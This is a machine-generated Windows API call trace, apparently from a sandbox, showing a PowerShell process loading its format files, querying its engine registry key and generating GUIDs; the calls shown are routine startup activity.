	[0145.117] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ccda0 | out: lpFileInformation=0x1ccda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0145.117] SetErrorMode (uMode=0x1) returned 0x1
	[0145.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0145.117] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cce88 | out: phkResult=0x1cce88*=0x324) returned 0x0
	[0145.117] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cce0c, lpData=0x0, lpcbData=0x1cce08*=0x0 | out: lpType=0x1cce0c*=0x1, lpData=0x0, lpcbData=0x1cce08*=0x56) returned 0x0
	[0145.117] CoTaskMemAlloc (cb=0x5a) returned 0x1b7f0fc0
	[0145.117] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccddc, lpData=0x1b7f0fc0, lpcbData=0x1ccdd8*=0x56 | out: lpType=0x1ccddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ccdd8*=0x56) returned 0x0
	[0145.117] CoTaskMemFree (pv=0x1b7f0fc0) 
	[0145.118] RegCloseKey (hKey=0x324) returned 0x0
	[0145.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0145.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0145.140] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xb6b2a57, Data2=0xc02e, Data3=0x436e, Data4=([0]=0xb5, [1]=0x15, [2]=0xe1, [3]=0x2c, [4]=0xf2, [5]=0xe, [6]=0x55, [7]=0x9f))) returned 0x0
	[0145.141] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xe703e9f1, Data2=0xf703, Data3=0x42a5, Data4=([0]=0x9b, [1]=0x7, [2]=0x46, [3]=0x5a, [4]=0xe7, [5]=0x92, [6]=0x3e, [7]=0xd5))) returned 0x0
	[0145.142] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xdaa60811, Data2=0xbd29, Data3=0x47f7, Data4=([0]=0x88, [1]=0xc6, [2]=0xe8, [3]=0x18, [4]=0x27, [5]=0x5e, [6]=0xbe, [7]=0x25))) returned 0x0
	[0145.142] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xbc744142, Data2=0x1507, Data3=0x4487, Data4=([0]=0x89, [1]=0x58, [2]=0xb7, [3]=0x9d, [4]=0x7b, [5]=0x16, [6]=0xb2, [7]=0x19))) returned 0x0
	[0145.143] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xddcf02ec, Data2=0xbf26, Data3=0x4744, Data4=([0]=0x9a, [1]=0xc9, [2]=0xa9, [3]=0xe6, [4]=0xcb, [5]=0x61, [6]=0x4, [7]=0x83))) returned 0x0
	[0145.143] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x2dd0290f, Data2=0x7b3b, Data3=0x4021, Data4=([0]=0x93, [1]=0x93, [2]=0x8e, [3]=0x10, [4]=0xd0, [5]=0x49, [6]=0xd8, [7]=0xf9))) returned 0x0
	[0145.144] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.145] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xf46b2a1, Data2=0xac88, Data3=0x4f50, Data4=([0]=0x9a, [1]=0x9f, [2]=0x50, [3]=0x89, [4]=0x87, [5]=0xcf, [6]=0x57, [7]=0x6d))) returned 0x0
	[0145.146] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.147] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.149] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xff60dec3, Data2=0xf5df, Data3=0x4f4e, Data4=([0]=0x8d, [1]=0x41, [2]=0x90, [3]=0x6b, [4]=0x63, [5]=0x1, [6]=0xf8, [7]=0xbb))) returned 0x0
	[0145.149] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xec972f2d, Data2=0x3f31, Data3=0x495d, Data4=([0]=0x8a, [1]=0x5d, [2]=0x57, [3]=0x14, [4]=0x33, [5]=0xff, [6]=0x73, [7]=0x1b))) returned 0x0
	[0145.149] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x8f172455, Data2=0xc4f0, Data3=0x4966, Data4=([0]=0x85, [1]=0xb9, [2]=0x2a, [3]=0x1d, [4]=0x99, [5]=0x48, [6]=0x96, [7]=0x22))) returned 0x0
	[0145.150] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x154c4cdc, Data2=0x87b0, Data3=0x4815, Data4=([0]=0xb7, [1]=0x17, [2]=0xd0, [3]=0x77, [4]=0xfc, [5]=0xc2, [6]=0x32, [7]=0x24))) returned 0x0
	[0145.150] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.150] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xcc340caf, Data2=0xf767, Data3=0x4b42, Data4=([0]=0x87, [1]=0xd5, [2]=0x1e, [3]=0x37, [4]=0x50, [5]=0xc7, [6]=0xfe, [7]=0x3))) returned 0x0
	[0145.150] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.150] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.151] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.151] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.151] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.152] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xa20e1371, Data2=0x9f95, Data3=0x4193, Data4=([0]=0xa3, [1]=0xd4, [2]=0x59, [3]=0x29, [4]=0xf0, [5]=0x42, [6]=0x93, [7]=0x2))) returned 0x0
	[0145.152] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x20741f0d, Data2=0x1ff2, Data3=0x4949, Data4=([0]=0xba, [1]=0x7a, [2]=0x9, [3]=0x0, [4]=0x57, [5]=0x25, [6]=0xc2, [7]=0xa2))) returned 0x0
	[0145.152] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xde61524b, Data2=0x5f5f, Data3=0x4d58, Data4=([0]=0xb9, [1]=0x6, [2]=0xbb, [3]=0xcc, [4]=0xe6, [5]=0x6e, [6]=0x2e, [7]=0x94))) returned 0x0
	[0145.153] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x6dd39475, Data2=0x89fe, Data3=0x406d, Data4=([0]=0xaf, [1]=0x3f, [2]=0x50, [3]=0xcd, [4]=0x62, [5]=0x1e, [6]=0x56, [7]=0x69))) returned 0x0
	[0145.153] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x7f919aa7, Data2=0xfe8f, Data3=0x431d, Data4=([0]=0x92, [1]=0xf1, [2]=0xb2, [3]=0xb8, [4]=0x3f, [5]=0x85, [6]=0xd2, [7]=0x10))) returned 0x0
	[0145.153] VirtualQuery (in: lpAddress=0x1cbd20, lpBuffer=0x1ccbe0, dwLength=0x30 | out: lpBuffer=0x1ccbe0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.154] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x592a02a5, Data2=0x53f2, Data3=0x4b85, Data4=([0]=0xa2, [1]=0x76, [2]=0x64, [3]=0x53, [4]=0x61, [5]=0x32, [6]=0x4a, [7]=0x70))) returned 0x0
	[0145.154] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xd65f9ced, Data2=0x647b, Data3=0x4158, Data4=([0]=0x8e, [1]=0xd5, [2]=0x21, [3]=0x23, [4]=0xa7, [5]=0xc3, [6]=0x15, [7]=0x3f))) returned 0x0
	[0145.155] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xfe6d94c4, Data2=0x5a8d, Data3=0x4431, Data4=([0]=0x95, [1]=0x84, [2]=0x2c, [3]=0x97, [4]=0x4e, [5]=0x2e, [6]=0x95, [7]=0x27))) returned 0x0
	[0145.155] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x9f525565, Data2=0x858a, Data3=0x4d87, Data4=([0]=0xa9, [1]=0x1e, [2]=0xd9, [3]=0xea, [4]=0x51, [5]=0xcd, [6]=0x1b, [7]=0xe3))) returned 0x0
	[0145.155] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x38e21f45, Data2=0x8651, Data3=0x4115, Data4=([0]=0xa2, [1]=0x2b, [2]=0xad, [3]=0x1f, [4]=0xe6, [5]=0xb7, [6]=0xcb, [7]=0xa0))) returned 0x0
	[0145.155] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xac1b671c, Data2=0x3cbf, Data3=0x4445, Data4=([0]=0x9f, [1]=0xf6, [2]=0x9b, [3]=0x98, [4]=0x4c, [5]=0x1e, [6]=0x29, [7]=0xd3))) returned 0x0
	[0145.156] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xc9da2ed9, Data2=0xbcf6, Data3=0x4ae3, Data4=([0]=0xa0, [1]=0x99, [2]=0x6b, [3]=0xb0, [4]=0x33, [5]=0x7f, [6]=0x56, [7]=0x42))) returned 0x0
	[0145.156] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x96767275, Data2=0x5cf6, Data3=0x49be, Data4=([0]=0x8d, [1]=0x4a, [2]=0x86, [3]=0xb0, [4]=0x4c, [5]=0x13, [6]=0x5e, [7]=0x9d))) returned 0x0
	[0145.156] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xa7e037fe, Data2=0x5584, Data3=0x47a9, Data4=([0]=0xbb, [1]=0xdb, [2]=0xb2, [3]=0x7b, [4]=0xde, [5]=0xdf, [6]=0x12, [7]=0x2))) returned 0x0
	[0145.157] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x457b1ab0, Data2=0x6058, Data3=0x462e, Data4=([0]=0xbf, [1]=0x5a, [2]=0x62, [3]=0xd6, [4]=0x4, [5]=0x2f, [6]=0xb5, [7]=0x68))) returned 0x0
	[0145.157] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xff80851f, Data2=0x7a50, Data3=0x47de, Data4=([0]=0xa1, [1]=0x89, [2]=0x8e, [3]=0x12, [4]=0x38, [5]=0xe5, [6]=0x41, [7]=0xd3))) returned 0x0
	[0145.157] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x8a9c4bfe, Data2=0xf15c, Data3=0x4d3e, Data4=([0]=0x9e, [1]=0xdc, [2]=0x32, [3]=0x3d, [4]=0x71, [5]=0xf7, [6]=0x7f, [7]=0x77))) returned 0x0
	[0145.158] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x6584f4de, Data2=0x633d, Data3=0x4be6, Data4=([0]=0x8e, [1]=0x7, [2]=0x47, [3]=0xf7, [4]=0x58, [5]=0x87, [6]=0x9e, [7]=0xbb))) returned 0x0
	[0145.158] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x6bc189ae, Data2=0xfab, Data3=0x43ab, Data4=([0]=0x80, [1]=0xdf, [2]=0xc7, [3]=0x14, [4]=0x2f, [5]=0x3e, [6]=0x70, [7]=0x9a))) returned 0x0
	[0145.158] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xb94a3c74, Data2=0x9cc9, Data3=0x42f6, Data4=([0]=0xa4, [1]=0xb7, [2]=0xca, [3]=0xb1, [4]=0xa7, [5]=0xfc, [6]=0x8c, [7]=0xcb))) returned 0x0
	[0145.237] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x5f2767f2, Data2=0xd76d, Data3=0x4202, Data4=([0]=0x8f, [1]=0xf1, [2]=0x5d, [3]=0xa2, [4]=0x7d, [5]=0xad, [6]=0xf0, [7]=0x51))) returned 0x0
	[0145.237] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xf003275a, Data2=0x20e7, Data3=0x4746, Data4=([0]=0xb8, [1]=0x8e, [2]=0x8e, [3]=0xcf, [4]=0xa6, [5]=0x23, [6]=0xef, [7]=0x0))) returned 0x0
	[0145.238] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x7d3f1ed, Data2=0xd568, Data3=0x4aa0, Data4=([0]=0x8d, [1]=0x67, [2]=0x64, [3]=0x93, [4]=0xf, [5]=0x19, [6]=0x66, [7]=0xb7))) returned 0x0
	[0145.238] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x2aee9cfd, Data2=0xc45a, Data3=0x48e5, Data4=([0]=0xbc, [1]=0xee, [2]=0x97, [3]=0x91, [4]=0x92, [5]=0xb8, [6]=0x62, [7]=0x45))) returned 0x0
	[0145.238] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.239] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.240] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.241] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x5b6e0bc9, Data2=0x83bd, Data3=0x4325, Data4=([0]=0xa3, [1]=0xd7, [2]=0x3a, [3]=0xc1, [4]=0x88, [5]=0xa1, [6]=0xad, [7]=0x1f))) returned 0x0
	[0145.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cc870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0145.242] SetErrorMode (uMode=0x1) returned 0x1
	[0145.242] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0145.242] GetFileType (hFile=0x320) returned 0x1
	[0145.243] SetErrorMode (uMode=0x1) returned 0x1
	[0145.243] GetFileType (hFile=0x320) returned 0x1
	[0145.243] ReadFile (in: hFile=0x320, lpBuffer=0x3666330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3666330*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.245] ReadFile (in: hFile=0x320, lpBuffer=0x3666330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3666330*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.245] ReadFile (in: hFile=0x320, lpBuffer=0x3666330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3666330*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.246] ReadFile (in: hFile=0x320, lpBuffer=0x3666330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3666330*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.247] ReadFile (in: hFile=0x320, lpBuffer=0x3666330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3666330*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.247] ReadFile (in: hFile=0x320, lpBuffer=0x3666330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3666330*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.247] ReadFile (in: hFile=0x320, lpBuffer=0x3666330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3666330*, lpNumberOfBytesRead=0x1ccdf8*=0x119, lpOverlapped=0x0) returned 1
	[0145.247] ReadFile (in: hFile=0x320, lpBuffer=0x3666330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x3666330*, lpNumberOfBytesRead=0x1ccdf8*=0x0, lpOverlapped=0x0) returned 1
	[0145.248] CloseHandle (hObject=0x320) returned 1
	[0145.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0145.248] SetErrorMode (uMode=0x1) returned 0x1
	[0145.248] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ccda0 | out: lpFileInformation=0x1ccda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0145.248] SetErrorMode (uMode=0x1) returned 0x1
	[0145.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0145.249] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cce88 | out: phkResult=0x1cce88*=0x320) returned 0x0
	[0145.249] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cce0c, lpData=0x0, lpcbData=0x1cce08*=0x0 | out: lpType=0x1cce0c*=0x1, lpData=0x0, lpcbData=0x1cce08*=0x56) returned 0x0
	[0145.249] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c0c10
	[0145.249] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccddc, lpData=0x1b7c0c10, lpcbData=0x1ccdd8*=0x56 | out: lpType=0x1ccddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ccdd8*=0x56) returned 0x0
	[0145.249] CoTaskMemFree (pv=0x1b7c0c10) 
	[0145.249] RegCloseKey (hKey=0x320) returned 0x0
	[0145.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0145.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0145.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.254] VirtualQuery (in: lpAddress=0x1cb920, lpBuffer=0x1cc7e0, dwLength=0x30 | out: lpBuffer=0x1cc7e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.255] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x386e95d8, Data2=0xd5d1, Data3=0x4db4, Data4=([0]=0xac, [1]=0xe1, [2]=0x51, [3]=0xac, [4]=0x61, [5]=0xe7, [6]=0x8f, [7]=0xdf))) returned 0x0
	[0145.256] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.259] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xd8ef60e, Data2=0x309b, Data3=0x4e02, Data4=([0]=0x80, [1]=0x8c, [2]=0xcf, [3]=0xed, [4]=0x34, [5]=0x16, [6]=0xef, [7]=0xd5))) returned 0x0
	[0145.261] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x434cf313, Data2=0x270d, Data3=0x43c0, Data4=([0]=0x93, [1]=0x4e, [2]=0xb2, [3]=0x58, [4]=0xc, [5]=0x85, [6]=0x70, [7]=0xbd))) returned 0x0
	[0145.262] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x1d3eb63e, Data2=0x6f28, Data3=0x4d76, Data4=([0]=0x97, [1]=0x6f, [2]=0x50, [3]=0xb, [4]=0xac, [5]=0x58, [6]=0xbf, [7]=0x3c))) returned 0x0
	[0145.262] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
